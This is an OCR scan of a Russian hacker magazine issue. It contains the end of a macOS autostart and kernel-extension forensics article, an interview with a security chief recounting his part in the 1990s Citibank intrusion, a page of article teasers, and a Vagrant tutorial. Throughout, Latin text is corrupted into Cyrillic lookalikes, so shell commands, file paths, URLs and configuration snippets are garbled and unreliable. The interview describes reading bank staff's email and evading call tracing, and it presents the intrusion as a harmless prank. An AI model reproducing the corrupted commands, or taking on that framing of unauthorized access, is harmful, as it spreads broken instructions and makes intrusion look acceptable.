• Модули ядра, загружаемые кехісі при старте системы: 

• /БузІет/иЬгагу/ЕхІепзіопз 

• Устаревшиедиректории: 

• /еіс/гс.іосаі 

• /еІс/тасЬ_іпі1.гі/ 

• /еІс/тасЬ_іпі1_рег_Іодіп_зе55Іоп.сі/ 

• /еІс/тасЬ_іпіІ_рег_изег.сІ/ 

Отмечу, что известные на сегодняшний день трояны для Мака ис- 
пользуют всего несколько пунктов из этого списка. 

Пример: получаю перечень загружаемых при старте системы 
модулей ядра не от Арріе (никаких кехізіаі, мы же работаем в статике!) 
и немного исследую модуль, вызвавший подозрение: 

МасВоок-Аіг-А1іза:~ изег$ саі 'бпсі /Бузіет/ІЛЬгагуА- 
Ехіепзіопз/ -пате ІпТо.рИзГ | §гер "СРВипсІІеІсІепііЯег" - 
-А 1 | §гер -ѵ сот. арріе | §гер -Р | амк ’а !~ ^ 

$1; {а=$1} ' 

<5Тгіп§>сот. Ир. Ьріо. Ьр_рза640_іо_епаЫег</5І:гіп§> 

<з1:гіп§>сот. Ир. Иріо. Ир_рзаБ30_630_іо_епаЫег</з'Ьгіп§> 
<зТгіпе>сот. зтісгоп . 1МісгопАТА</з-1:гіп§> 

<зігіп§>сот. рготізе. сігіѵег. зіех</зігіп§> 
<5ігіп§>сот.5і1аЬз.сІгіѵег.СР210хѴСРОгіѵег</5І:гіп§> 
<5Игіпе>сот.5і1аЬз. сігіѵег. СР210хѴСРОгіѵег64</з1:гіп§> 
<з*гіп§>сот. зо-РСгаісІ.сІгіѵег.5оТі:КАЮ</5ігіп§> 

< 5І:гіп§>сот . МозСИір . сігіѵег . МС57840</зігіп8> 
МасВоок-Аіг-А1іза:~ изег$ 1з /Бузіет/ІіЬгагу/Ехіепзіопз/ «-> 

| §гер рготізе 

МасВоок-Аіг-А1іза:~ изег$ тсійпсі -опіуіп /Бузіет/НЬгагу/.-' 
ЕхТепзіопз/ "рготізе" 

/Бузіет/ІЛЬгагу/Ехіепзіопз/РготізеБТЕХ.кехІ: 

МасВоок-Аіг-А1І5а : СНготе> §оо§1е "сот. рготізе. сігіѵег. зіех" 



АЬоиі 45 гезиііз (0.23 зесопсіз) 

МасВоок-Аіг-А1іза:~ и5ег$ саі /Бузіет/ІіЬгагу/Ехіепзіопз/^ 

РготізеБТЕХ.кех^/СопіепТз/Іп-Ро.рІізі 

<?хт1 ѵегзіоп="1.0" епсос!іп§="ІІТР-8" ?> 

< ЮОСТѴРЕ ріізі РІІВИС "-//Арр1е//0Ю РИ5Т 1.0//ЕМ" _ 

"НТір : //\ыш . арріе . сот/ОТОз/РгорегіуЕізі-1 . 0 . сІТсГ > 

<р1із1: ѵегзіоп="1.0"> 

<сІіс1:> 

<кеу>Виі1сІМасИіпе05Виі1сІ</кеу> 

<зігіп§>11А511</з1:гіп§><кеу>СРВипсІ1е0еѵе1ортепі:Ке§іоп</кеу> 

<5ігіп§>Еп§1ізИ</5і:гіпе> 

<кеу>СРВипсІ1еЕхеси1:аЫе</кеу> 

<5ігіп§>Рготізе5ТЕХ</5І:гіпе> 

<кеу>СРВипсІ1еСеТІп-Ро5ігіп§</кеу> 

<зТгіп§>Ѵегзіоп : 5.0.62, Соругі^ИТ (с) 

2010 Рготізе ТесИпо1о§іез, Іпс.</з*гіп§> 

МасВоок-Аіг-АІіза: СНготе> §оо§1е "Рготізе ТесИпоІобіез, Іпс." 
Рготізе ТесИпоІоеіез, Іпс. | АТА КАЮ сопігоііегз апсі - 
зиЬзузіетз ... ѵлм.тоііоптесііа.сот > НагсЫаге 



Напоследок немного исследовательского вдохновения. Все знают, 
что система 05 X основана на РгееВБЭ и МасИ и наследует некоторые их 
особенности. Менее известно, что эти особенности унаследованы бессис- 
темно, наряду с устаревшими функциями проприетарной части системы. 
Например, стандартный для ІІІЧІХ загрузочный скрипт гс.іосаі отсутствует 
по умолчанию. А вот цитата из Мае йеѵеіорег ЫЬгагу про него: «Ѵои сап 
риі іИезе Ьл/о соттапсіз іп уоиг /еіс/гс.іосаі НІе Іо ехесиіе а* зіагіир Нте». 
Читай: точки старта кода, унаследованные из старых версий 05 X и ее 
предшественников, с большой вероятностью могут поддерживаться в по- 
следних версиях 05 X, даже если отсутствуют в стандартной инсталляции. 
Тему нестандартных автозагрузок на Маке предоставим исследовать 
читателю. Рекомендуемая литература: Мае Реѵеіорег ЫЬгагу ТесЬпісаІ Ыоіе 
ТМ2083, раздел йергесаіесі Оаетопотісоп ( ооо,аІ/д08Ро ).3: 
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Интервью с Алексеем Смирновым 



АЛЕКСЕЙ СМИРНОВ двкдыою 

ДИРЕКТОР ПО ИНФОРМАЦИОННОЙ 
БЕЗОПАСНОСТИ КОМПАНИИ РДЯАІ.І.ЕІ.5 



Наш сегодняшний гость — СІ50 компании РагаІІеІз, известный российский ѵѵНІІеНаІ Алексей Смирнов. 
Однако в прошлом Алексей был не менее известным хакером, успел поучаствовать в легендарном взло- 
ме СІІІЬапк в середине девяностых, да и вообще предпочитал работе в офисе свободу и частный кон- 
салтинг. Мы постарались подробно расспросить его об этом переходе на «светлую сторону Силы», про 
Іоѵѵ-ІесЬ девяностых, узнать побольше о знаковой истории взлома маститого банка и многом другом. 



ХАКЕРЫ В ДЕВЯНОСТЫЕ 



Все началось в старших классах, когда я заинтересовался компью- 
терами. В школьные годы я думал, что стану химиком, но в какой-то 
момент новый интерес начал брать верх. В итоге я сменил изучение 
естественных наук на изучение химер человеческого разума. 

Серьезный интерес пришел с первого знакомства с многопользова- 
тельскими системами в вычислительном центре. Это был восемьдесят 
девятый год, когда я поступил в Технологический институт в Санкт- 
Петербурге и до всего этого хозяйства добрался. 

Естественно, я сразу же начал хулиганить. Что еще мог делать моло- 
дой человек в том возрасте? Нет, конечно, я старался делать и конструк- 
тивные вещи, но очень любил найти какие-то неочевидные способы при- 
менения компьютера, чтобы посмотреть как на техническую сторону, так 
и на реакцию окружающих. 

Тогда на многих системах не было даже элементарной файловой за- 
щиты. Многопользовательская защита у наших клонов ІВМ'овских мейн- 
фреймов была на каком-то эмбриональном уровне. Все зависело только 
от желания. Скажем, если кто-то что-то печатал, можно было поймать 
файл в спуле принтера и что-нибудь там заменить. 

Ник АгкапоШ, кстати, появился тогда же, в 1989 году. В то время 
я очень презрительно относился к «персоналкам», говорил, что они 
мало на что годятся, мол — вот в «Арканоид» на них поиграть можно. Так 
и прижилось. 

Дальше появились модемы, любительские сети, РЮО, Реаісот, который 
тогда работал на технологии ІІІІСР (почти интернет, который только почта). 

В какой-то момент я узнал о существовании сетей Х.25. Это был при- 
мерно конец 1993 года, когда я обнаружил, что, оказывается, можно со- 
единяться с удаленными компьютерами онлайн. 

Это казалось чем-то невероятным. Не звонить куда-то по телефону, 
а звонить на обычный городской номер и дальше получать доступ к уз- 
лам по всему миру. Раньше ведь нужно было посылать удаленные коман- 
ды, которые через почтовые гейты шли куда-то далеко, либо нужно было 
звонить по модему. А существование онлайновых сетей... это было нечто 
полумифическое. Конечно же, я начал эксперименты. 

Естественно, тогда было огромное коли- 
чество разных компьютеров практически 
безо всякой защиты. Было время непуга- 
ных идиотов, так что часто достаточно было 
лишь попробовать. 

С единомышленниками общались в ос- 
новном через ІРС. Были самые разные ка- 
налы, русскоязычные, англоязычные. Если 
память мне не изменяет, в 1994 году произо- 
шло большое разделение ІРСпеІ на ІРСпеІ 



и ЕРпеІ. После стало трудно общаться с американскими знакомыми (они 
все остались в ЕРпеі), а русские, по непонятной причине (нашелся мест- 
ный российский сервер), остались в ІРСпеІ. 

Тогда самые разные люди занимались самыми разными вещами. Кто- 
то — взломом сотовых телефонов, кто-то — телефонными сетями и воз- 
можностью бесплатно звонить по межгороду. 

Я занимался всем понемногу. Мой энтузиазм в области хардверного 
хакинга был ограничен в основном патологически кривыми руками — 
я очень плохо держу в руках паяльник. Соответственно, все, связанное 
с попытками создать даже простейшее устройство, у меня вызывает 
большие проблемы. 

Зато с программной точки зрения... помните, были такие сети ЫМТ-450? 

К ним еще появилось дополнение стандарта 450і с улучшенной безопас- 
ностью, которая не давала клонировать телефоны. В общем, я нашел их 
авторизационный центр и даже успел там немного поковыряться. Но пока 
я раздумывал, куда эту информацию применить, стало ясно, что эти сети 
уже обречены и нет смысла заниматься клонированием этих телефонов. 



ВЗЛОМ СІТІВАЫК 



Больше всего в те времена меня раздражало, как пресса освещала эту 
историю. Все выглядело так, будто какие-то люди нашли уязвимость 
и просто влезли в компьютер. На самом деле не просто «влезли в ком- 
пьютер» — это был большой, масштабный проект по сбору и системати- 
зации информации. 

Заварилось все это почти сразу после того, как я увидел Х.25, то есть 
в конце 1993 года — начале 1994-го. Суммарно все заняло чуть меньше 
года. 

У этого «проекта» не было конкретной цели. Это был сЬаІІепде, это 
было интересно как процесс. Мы не собирались воровать деньги: кто- 
то из моральных принципов, кто-то из-за того, что хорошо представлял 
себе, насколько это замороченное предприятие и какими последствиями 
оно чревато. Помимо этого, непременно пришлось бы общаться с разны- 
ми неприятными людьми, чтобы как-то вывести оттуда деньги, а этого 
никому не хотелось. 

Тогда мейнфреймов, с которыми можно было играть, стало очень 
мало. Те места, где они еще остались, были недоступны. А в СІІІЬапк мож- 
но было посмотреть на большие настоящие системы, на большие настоя- 
щие сети, которые строились с крупным бюджетом, да и вообще увидеть, 
как люди решают свои задачи. 

Конечно, тогда мы сделали большую глупость, априори сочтя всех 
членов группы разумными людьми, представляющими себе цену ин- 
формации, с которой мы работаем. Казалось удивительным, что один 
из нас решил распорядиться ей так глупо... Сейчас мне кажется, что это 
было абсолютно ожидаемо. 



АЛЕКСЕЙ 

• ИспользуетБсіепМіс 
Ыгшх в качестве 
основнойОС. 

• Любитотдых 
подпарусом. 

• Увлекается историей 
Древнего Египта. 
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В группе было чуть больше десятка человек — переменный состав, 
кто-то приходил, кто-то уходил. 

Один из наших продал информацию Левину. Этот человек полез 
в СШЬапк и, разумеется, попался. 

Общение нашей группы проходило на сервере внутри самого 
СШЬапк. Там была одна машинка — фактически публичная ВВ5. На нее 
так или иначе натыкался любой, кто гулял по сети. Для того чтобы даль- 
ше обмениваться личными сообщениями, пользоваться чатом и так да- 
лее, нужно было иметь некие внутренние кредиты, но они достаточно 
легко получались — либо переводом с другого аккаунта, либо можно 
было зарегистрироваться липовым сотрудником СіІіЬапк и получить их. 

Мы собирали много информации. Айтишники в СіІіЬапк довольно хо- 
рошо документировали то, что делали, охотно делясь друг с другом сво- 
ими планами. Можно было найти любые данные: вплоть до того, у какого 
ветеринара кто-то из них лечит свою собаку и когда они планируют про- 
вести шахматный турнир. И на какие имена в СіІіЬапк выписывают про- 
пуск, чтобы их туда пустили. 

В основном данные брали из почты. Мы понимали, что читать чужую 
почту нехорошо, но в то время эти люди находились все равно что на дру- 
гой планете — они не воспринимались персонально. В основном мы ло- 
мали конкретные машины людей, не серверы. Почта проходила через 
рабочие станции на ОрепѴМБ, и там лежали ящики, где были довольно 
большие архивы. 

Нельзя сказать, что мы нашли какую-то одну уязвимость. Напротив, 
там было очень много самых разных системных проблем. 

Были некоторые баги, на которые мы натолкнулись случайно. К сло- 
ву, их могли обнаружить только люди, пользующиеся кириллицей. К при- 
меру, некоторый (ігтѵѵаге просто падал из-за наличия восьмибитных 
символов в потоке. 

Тогда все было совсем Іоѵѵ ІесЬ. Эксплойты, в традиционном их по- 
нимании, только-только стали известным инструментом. Скорее, все 
выглядело так: можно было отправить устройство на перезагрузку, под- 
ключиться к консольному порту, который торчит в сеть, в первые секун- 
ды после перезагрузки и изменить конфигурацию. 

Понято, что там были какие-то ІІЖХ'ы. Мои товарищи даже закачи- 
вали туда свежий и еще опенсорсный Іпіегпеі Бесигііу Бсаппег, модную 
ломалку паролей под названием Сгаск. Но меня ІІІМІХ'ы интересовали 
мало: мне на тот момент казалась более интересной система ѴАХ/ѴМ5. 

Интернет тогда уже существовал, но к нему все это не имело никако- 
го отношения. Все происходило отдельно — у СіІіЬапк была внутренняя 
ІР-сеть, которая... я не помню точно, как она подключалась к интернету, 
да и нас это мало интересовало. 

Мы знали, как попасть туда через Х.25. На крайний случай у нас 
даже имелся список прямых номеров в Штатах, на которые можно было 
звонить модемом. Правда, когда все закончилось, мы не рискнули ими 
пользоваться. Хотя вышло довольно забавно: СіІіЬапк был уверен, что, 
отключив доступ к подсети Х.25, они обезопасились, но на самом деле 
это было не так. 

А Левин полез туда и сразу заинтересовался, каким образом мож- 
но попробовать выводить деньги. Никто так и не понял, что произошло 
дальше. Существует версия тех, кто занимался расследованием этого 
со стороны СіІіЬапк. Есть и официальные материалы дела, которые пу- 
бликовалисьтогда. Говорят, определенная сумма тогда так и потерялась. 

Поймали его потому, что, во-первых, он начал проводить операции 
со счетами. Во-вторых, все-таки определенное количество систем мо- 
ниторинга на разных уровнях там имелось (другое дело, что никакой 
человеческой интерпретации результатов их работы не происходило). 
Но видимо, в какой-то момент что-то сработало. Судя по тому, насколько 
Левин был неосторожен с компьютерами, скорее всего, он был так же не- 
осторожен с финансами и сделал что-то на этом уровне. 

Он переводил деньги на другие счета, потом полетел в США, где его 
тепленьким «приняли». К тому времени за ним уже довольно долго сле- 
дили. Я даже знаю, какими именно методами. Чистое везенье, что на те- 
лефонных звонках попался именно он, а не кто-то из наших. Ну или почти 
чистое. Дело в том, что отслеживали не на уровне телефонной станции, 
а с помощью обычных бытовых АОН’ов. Помеха, которую можно было до- 




бавить в линию, не давала от них стопроцентной защиты, но мы пользо- 
вались хотя бы этим, когда звонили. 

Но при расследовании этого дела других участников искать никто не 
стал — ни СіІіЬапк, ни компетентные службы. Конечно, мне было бы ин- 
тересно узнать, как именно шло расследование в СіІіЬапк, пообщаться 
с людьми на той стороне. Я точно знаю, что как минимум один человек 
сделал потом в ИБ довольно неплохую карьеру. Кажется, он как раз на тот 
момент занимал должность директора по ИБ в СіІіЬапк. Ито, как он после 
этой встряски стал все реорганизовывать, повлияло на него и его даль- 
нейшую судьбу благоприятно. 

Сейчас об этом уже можно говорить открыто. Все случилось так дав- 
но, что любые сроки давности уже прошли. Еще стоит учесть два допол- 
нительных момента. Во-первых, тогда по актуальным российским за- 
конам это преступлением не являлось — статьи в УК появились позже. 
Во-вторых, отсутствие у нас какого-либо корыстного интереса. Это была 
шалость, и не нужно воспринимать это иначе. 



ОТ КОНСАЛТИНГА К СІБО 



В начале девяностых не было особенного профессионального разделе- 
ния. Один из двух-трех ІТ-специалистов на маленькую компанию обяза- 
тельно был на все руки мастером. 

Кажется, стоял 1996 год, когда меня впервые наняли на работу СІ50 
в один из интернет-провайдеров в Петербурге. Если не ошибаюсь, это 
был первый провайдер, решивший нанять на работу собственного СІ50. 
И они наняли меня по личной рекомендации: вся тусовка тогда была не- 
большой, и людей, понимающих в безопасности, было мало. 

Тогда это было ново и интересно. Как всегда, была и какая-то разра- 
ботка. Тогда же я начал писать свои первые модули для файрвола, и про- 
ект до сих пор странным образом жив. Это файрвол уровня приложения, 
своеобразный конструктор, позволяющий писать набор прокси на языке 
С. Как ни странно, некоторые до сих пор его применяют. 
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Интервью с Алексеем Смирновым 



Довольно долго я пытался извлечь из этого проекта коммерческую 
выгоду, но в основном не получалось — очень трудно вытащить себя 
из болота за волосы. Чтобы делать деньги на таких проектах, в них нуж- 
но хоть что-то вкладывать, и не только с точки зрения программирования, 
но и в маркетинг. Однако все люди, с кем я тогда сотрудничал, пытались 
этот этап обойти. Естественно, в итоге ничего не получилось. Обидно, по- 
тому что практически все, кто догадался тогда вложить хотя бы неболь- 
шую копеечку, даже в самый бестолковый продукт, стали миллионерами :). 

Но в то время мне было просто интересно поиграть с технологи- 
ями, пообщаться с людьми. Я тогда завязал множество интересных 
контактов с зарубежными коллегами. Ведь почти все, кто начинал 
в середине девяностых, сейчас довольно известные люди. 

Другие места работы тоже были. В начале нулевых мы делали сервис 
по фильтрации почты отспама и вирусов. Набрали много разных опенсорс- 
ных средств и пытались автоматизировать их обучение. Сейчас я с удивле- 
нием наблюдаю, что этот сервис до сих пор продолжает работать. 



РАБОТА В РАВА1_1_Е1_5 



До РагаІІеІз я занимался в основном консалтингом по безопасности 
в качестве независимого предпринимателя. К тому моменту я уже во- 
обще не представлял себе, что когда-либо снова пойду в офис. Мне это 
претило. Я считал, что мне это не нужно и что свобода дороже. 

В 2011 году глава разработки Стас Протасов убедил меня стать ча- 
стью команды РагаІІеІз. В случае с РагаІІеІз все тоже начиналось с кон- 
салтинга. Сначала я помогал РагаІІеІз разобраться в текущей ситуации, 
а потом стало ясно, что работы много, а я на тот моментуже жил в Москве. 

Тогда передо мной стояла задача — оценить текущее состояние ИБ. 
Для общего аудита сетевой безопасности была привлечена сторонняя 
компания, а моя работа началась с того, что нужно было интерпретировать 
полученные ими данные, выделить из них что-то важное и понять, что де- 
лать дальше. Непростая задача, когда ничего не знаешь о компании. 

Впрочем, положение было отнюдь не трагичное. Да, безопасность 
в компании была на тот момент, что называется, асі Ьос — решали про- 
блемы по мере их поступления. Но могло бы быть и хуже. Видимо, сыгра- 
ло свою роль то, что у нас очень хороший ІТ-отдел, где люди в состоянии 
заниматься безопасностью, даже если это не их основная профессия. 

Работа в компании сильно отличается от обычного консалтинга, и я до- 
вольно долго к этому привыкал. Представьте себе, что вчера я общался 
с тремя людьми за раз (и больше в голове держать не нужно), а сегодня 
я работаю с 15-20 людьми... это совсем другой способ работы головы. 

Занимаясь консалтингом, я привык к очень тяжелому сопротивле- 
нию. В РагаІІеІз в основном работают гуру, и воспринимают они все не- 
ожиданно легко. Если удается объяснить, зачем это нужно, как правило, 
сопротивления не возникает вовсе. 

Сейчас у нас нет отдельной организационной единицы, которая от- 
вечала бы только за безопасность. Скорее, нужно находить людей, ко- 
торые интересуются безопасностью в своей основной работе, помогать 
им сориентироваться, взаимодействовать. Словом, в первую очередь — 
коммуникации и аналитика, возможность поделиться даже не знаниями, 
а видением, как делаются какие-то вещи. 

В числе прочего я приглядываю и за безопас- 
ной разработкой кода. С этим сложно, потому 
что у нас много продуктов, а значит — разные 
команды, разные традиции. Конечно, хотелось 
бы внедрять какие-то лучшие практики (как 501 
в МісгозоК). Сейчас у нас начинает складываться 
хорошая традиция делиться информацией. 

Я планирую собирать все воедино, в каком-то 
формализованном виде, но в первую очередь важ- 
на сама возможность рассказать. У нас есть и еще 
одна традиция — устраивать внутри компании 
технические доклады. К сожалению, я еще ни разу 
не читал лекций. Но, например, Антон Дедов, ар- 
хитектор по безопасности РагаІІеІз Аійотаііоп, 
уже прочитал пару хороших докладов, связанных 
именно с безопасной разработкой. 



Лично мне хотелось бы видеть и программу вознаграждения за най- 
денные уязвимости. Увы, я не могу делать на этот счет никаких публич- 
ных анонсов, но, естественно, я это приветствую. Хотя неофициально 
вознаграждение за серьезные найденные уязвимости у нас присутствует. 
В первую очередь это, конечно, касается уязвимостей в серверных про- 
дуктах и всего, что может повлиять на безопасность наших клиентов, — 
облачные услуги, хостинг и так далее. Прецеденты были и, думаю, будут. 

Мы часто привлекаем сторонние компании для аудита наших продук- 
тов. Для нас это привычная практика. Держать такое количество квали- 
фицированных людей в штате, мне кажется, не нужно. Поэтому мы и при- 
няли такой подход — частично распределенный, частично аутсорсинг. 

Можно долго разбрасываться словами из учебника, вроде разделе- 
ния полномочий. Но это не так важно. Я считаю, что даже если стати- 
ческая картинка имеющегося кода кому-то и достанется, пускай у него 
и остается, мы все равно сделаем так, что она ему не поможет. Конеч- 
ная цель заключается в том, чтобы к тому времени, когда любой сможет 
разобраться в этом коде и нанести вред, все баги уже были починены, 
а новая функциональность была такова, что старая окажется вчераш- 
ним днем. зс 



ПОЧТИ ВСЕ, 

КТО НАЧИНАЛ 
В СЕРЕДИНЕ 
ДЕВЯНОСТЫХ, 
СЕЙЧАС ДОВОЛЬНО 
ИЗВЕСТНЫЕ ЛЮДИ 







Ргеѵіеѵѵ 



30 страниц на одной полосе. 
Тизер некоторых статей. 



РС20ЫЕ 



ГОВОРИТ И ПОКАЗЫВАЕТ РА5РВЕЯРѴ РІ 

34 Скажем прямо: кактолько в редак- 
ции оказаласьмалиновая малютка, 
она запала нам в душу. Поэтому статей 
о РазрЬеггу Рі будетеще много, но начать 
решили с чего-то простого и приятного. 
Аглавное— полезного. Сделаем из нее 
медиацентр. 

Машинка подходит на эту роль 
идеально: тихая, маленькая, экономная, 
с неплохим видеочипом и возможностью 
подключения периферии и сетевого 
провода. Крометого, последний релиз 
популярнейшего медиаплеера ХВМС 
как раз получил поддержку РазрЬеггу Рі. 
Номы не ограничились настройкой пле- 
ера— в статье тебя ждет набор полезных 
аддонов и утилит. 




РС20ЫЕ СЦЕНА 



Х-МОВИЕ 




ВИРТУАЛЬНЫЙ помощник 

29 Настраиваем среду автоматизирован- 

ной виртуализации с помощью Ѵадгапі 
иѴИиаІВох. 




44 



БЫТЬ СТРАННЫМ 

История операционной системы Ве05 
и обзор ее современного наследника, 
Наіки. 
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ИЗ КИТАЯ С ЛЮБОВЬЮ 

Выбираем дешевый китайский планшет: 
личный опытпокупки и обзор лучших 
устройств. 



взлом 



МАЮТАКЕ 




73 



ТАКОЙ НЕБЕЗОПАСНЫЙ ѴРН 

Роднойтуннельнетак защищен, 
какты думаешь,— обзор нескольких 
характерныхуязвимостей. 



90 



БАР: ПОД ШКВАЛОМ РАЗЯЩИХ СТРЕЛ 

Доклад об исследовании сервера при^ 
ложений 5АР МеІѴѴеаѵег 32ЕЕ Епдіпе, 
заставивший немцев поволноваться. 



96 



СЕССИЯДЛЯЗЛОКОДЕРА 

Знакомимся с системой сессий 
в Мпсіоѵѵз и учимся внедрять в нее по- 
сторонние процессы. 
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Виртуальный 

помощник 

ЗНАКОМИМСЯ 
С ИНСТРУМЕНТОМ 
ѴА6КАЫТ 



Как насчет того, чтобы поднять работу с ѴігІиаІВох 
на новый уровень — создавать виртуальные маши- 
ны быстро и целыми пачками, организуя их в сеть? 
Что, если одним конфигурационным файлом и па- 
рой команд создавать простую и воспроизводимую 
структуру серверов, управляя шарингом папок 
и перенаправлением портов? Уже интересно? 




РС20ЫЕ 



Г лавная страница проекта сообщает, что ему уже выразили 
доверие такие гиганты мира ІТ, как МогіІІа, Ыокіа или 0150115. 
«Бродяга» (а именно так переводится название проекта) 
создан в лучших традициях эпохи гитхаба: 

1. Простой и приятный информативный сайт: ѵѵѵѵ\л/.ѵаогап1ир.сот . 

2. Исходный коднаписан на ПиЬуи выложен на широкое обозрение: 
ЬіІР5://діІЬиЬ.сот/ті(сЬе1ІЬ/ѵадгапІ . 

3. За два года существования он успел обрасти большим количеством 
дополнений и плагинов на любой вкус. 

УСТАНОВКА 

Несмотря на то что Ѵадгапі — это всего лишь рубишный гем, создатели 
предлагают сразу несколько способов установки. 

Первый — установка соответствующего операционной системе пакета 
с сіоѵѵпіоасіз.ѵаогапіир.сопп . Там есть нативные инсталлеры подМпЬоѵѵз, 
05 X и распространенные дистрибутивы Ыпих ЮеЬ/РРМ-пакеты, а также 
общий инсталлер). Второй — установка соответствующего гема: 

$ §ет іпзТаІІ ѵа§гап* 

После этого в системе появится новая команда — ѵадгапі. И мы уже 
готовы создать нашу первую виртуалку: 

$ ѵа^гапі: Ьох асИ ргесізе64 «-> 

Ь«р : / /6ІѲ5 . ѵа§гап*ир . сот/ргесізе64 . Ьох 
$ тксііг ту_ргодес1: 

$ сд ту_ргодес1: 

$ ѵа§гап1: іпі* ргесізе64 
$ ѵа^гапТ ир 

Теперь убедимся, что она работает, — проверим ее состояние: 

$ ѵа§гапТ 5*а1:и5 
Сиггепі ѴМ зТаТез: 

ЬеТаиІ* гиппіп§ 

И зайдем по 55Н, увидев стандартное приветствие убунты: 

$ ѵа§гап1: ззЬ 

Іліеісоте То ІІЬипТи 12.04 І_Т5 
(СШ/І_іпих 3. 2 . 0-23-§епегіс х86_64) 

* ОоситепТаТіоп: ЬТТр5://Ье1р.ііЬипТи.сот/ 

Іліеісоте Іо уоиг ѴаегапТ-ЬиіІТ ѵігТиаІ тасЬіпе. 

Ьазі: Іоеіп: Моп Зап 28 13:51:24 2013 Тгот 10.0.2.2 
ѵаегапТ@ргесІ5е64 : 

БАЗОВЫЕ СБОРКИ 

Базовые сборки [Ьазе Ьох) — это специальным способом подготов- 
ленные шаблоны виртуальных машин, из которых потом созда- 
ются непосредственно виртуальные среды вагранта. Дело в том, 
что для ускорения процесса создания виртуалки он копирует су- 
ществующую базовую сборку и уже ее настраивает в соответствии 
с конфигурационным Ѵадгапі-файлом. В результате пользователь, 
с одной стороны, может не беспокоиться о некоторых нюансах кон- 
фигурации виртуалки (например, объеме памяти или сетевых кон- 
троллерах), с другой стороны — все эти нюансы при необходимости 
могут быть легко изменены. Также в большой степени экономится 
время на создании новой машины, что позволяет в любой момент 
«убить» все ненужное, а потом создать по новой. Базовые сборки 
в систему добавляются командой: 

$ ѵа^гапТ Ьох асісі <имя сборки> <иг1 для загрузки> 

Сами разработчики вагранта предлагают четыре вида базовых 
сборок — два последних релиза ІІЬипІи в 32- и 64-битном исполне- 
нии [одну из них мы только что уже установили в системе): 



от»* 

$СП>Л01 Ѵ-«* ОдеДО 

5 СепегдІ 

* — 

А О 



ОгасІ* ѴМ Ѵітмівех Мѵи«е< 



#Ро**«г*<1 ОК 



ві 



А Ргеѵі*** 



Сгмі* ѴіИш) М^сЫп* 



Тур* 

Ѵ*ГІІОП 



Ііпих 



ЩніШи (64 ЬіО 



Оо поі ідб а ѵіпиді Паггі гігіѵ» 

(• • Сг«м* * ѵіпмі Наггі Йпѵ* по*» 

1»м ап схіміпд ѵіПиаІ Наяі 4ггѵ* ПІ* 

ТЬіпді.ѵгіі (\о«таІ, в ОО СВ) 




В ѴігІиаІВох 4.2 значительно упростился процесс создания новой машины 



• ІІЬипІи 1_исіс) 32 Віі ІііІе5.ѵадгапІир.сот/ІисісІ32.Ьох ) 

• ІІЬипІи ЬисісІ 64 ВЦ [ііІе5.ѵадгапІир.сот/ІисісІ64.Ьох ) 

• ІІЬипІи Ргесізе 32 ВіЕ (ЕіІе5.ѵадгапЕир.сот/ргесІ5е32.Ьох ) 

• ІІЬипІи Ргесізе 64 Віі ( ЕіІе5.ѵаогапІир.сот/ргесІ5е64.Ьох ) 

Но на этом список далеко не заканчивается. Существует специ- 
альный сайт, где каждый желающий может выложить свою базо- 
вую сборку. Он располагается по адресу: ѵѵѵѵѵѵ.ѵадгапЕЬох.ез . Там 
любой может выбрать себе что-нибудь по вкусу. В ассортименте: 
йеЬіап, ѴѴіпсіоѵѵз 5егѵег, РгееВБй, СепЮ5, бепЕоо и другие. 

Кроме того, ты легко можешь создать собственную стартовую 
конфигурацию, но об этом чуть позже. 

ѴАЭРАМТ-ФАЙЛ 

Важной частью системы является специальный конфигураци- 
онный файл, написанный на ВиЬу. Он называется ѴадгапМіІе 
и описывает виртуальные машины, необходимые в проекте. Пред- 
полагается, что в команде для разработки используется один и тот 
же ѴадгапМіІе, который распространяется через систему контроля 
версий между ее членами. Важно заметить, что ѴадгапЕ читает кон- 
фигурацию последовательно из четырех мест и каждый последу- 
ющий этап может изменять параметры предыдущего. Итак, точный 
порядок загрузки такой: 

1. Сначала загружается ѴадгапЕЕіІе, содержащийся в руби-геме. 

2. Следом загружается ѴадгапЕЕіІе издиректории базовой сборки 
(если она было собрана с параметром --ѵадгапНіІе). 

3. Потом загружается ѴадгапНіІе из домашнего каталога пользова- 
теля (-/.ѵадгапі.сі/), позволяя пользователю добавитьдля него 
какие-либо параметры. 

4. И последним загружается ѴадгапШІе издиректории проекта. 

В большинстве случаев именно в нем находятся все основные 
настройки проекта, и именно этот файл стоит добавить в систему 
контроля версий. 

Полный список доступных настроек для вагрантфайла со- 
держится в документации (Ьосз.ѵадгапЕир.сот/ѵШосз/ѵадгапНіІе. 
Ьіті). Только что созданная виртуальная среда имеет минималь- 
ный конфиг вида: 

Ѵа§гапТ: :Сопб§.гип сіо |сопб§| 
сопб§. ѵт.Ьох = "ргесІ5е64” 
епсі 



озо 
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НОВШЕСТВА ѴІРТІІАІ_ВОХ 4.2 



Кстати, не так давно Огасіе выпустили новую 
версию ѴігІиаІВох под номером 4.2. Если 
ты еще не перешел на актуальную версию, то, 
вероятно, тебе будет интересно узнать о нов- 
шествах. 

Г руппы виртуальных машин 

В новом менеджере появилась возможность 
группировать виртуалки по какому-либо прин- 
ципу (например, по типу операционной системы, 
по проекту, в котором они используются, или 
как-либо еще). Группы позволяют организовать 
весь зоопарк, который появляется у опытных 
пользователей виртуалбокса, а также выполнять 
групповые операции — например, можно разом 
стартануть несколько машин, выбрав соответ- 
ствующую команду в группе. 

Автостарт? Запуск «безмордовый» 

Так называемый Неабіевв ІаипсЬ — то есть за- 
пуск виртуалки без открытия соответствующего 
окна с интерфейсом машины — теперь возможен 
прямо из менеджера. Если раньше, чтобы 
запустить виртуальную машину, приходилось от- 
правляться в консоль, набирать там что-то типа: 



$ ѴВохМапа§е вІагЬѵт ... --Іуре МеасИезз 

то теперь достаточно при запуске виртуаль- 
ной машины из интерфейса ѴіііиаІВох зажать 
<5ЫК>. Остановить запущенную в ЬеабІеБЗ 
режиме виртуалку можно также из менеджера, 
выполнив соответствующую команду. 

Создание виртуалок в два клика 

Это, правда, чисто интерфейсное улучшение 
(то есть ни о каком программном ускоре- 
нии создания виртуальной машины речи 
не идет), но все же. Если на первом диалоге 
при создании новой виртуалки нажать кноп- 
ку «Скрыть описание», то появится другой 
диалог типа «все в одном», в котором можно 
будет быстро настроить параметры создавае- 
мой машины. 

Улучшения сетевых интерфейсов 

Теперь ѴігШаІВох позволяет создавать вирту- 
альные машины с 36 сетевыми картами на бор- 
ту. Также представлен новый функционал 
регулирования пропускной способности, чтобы 
ограничить «прожорливость» виртуалки. 



Повышение производительности процессоров 

Многие современные процессоры поддержи- 
вают технологию виртуализации вложенных 
страниц для блока управления памятью про- 
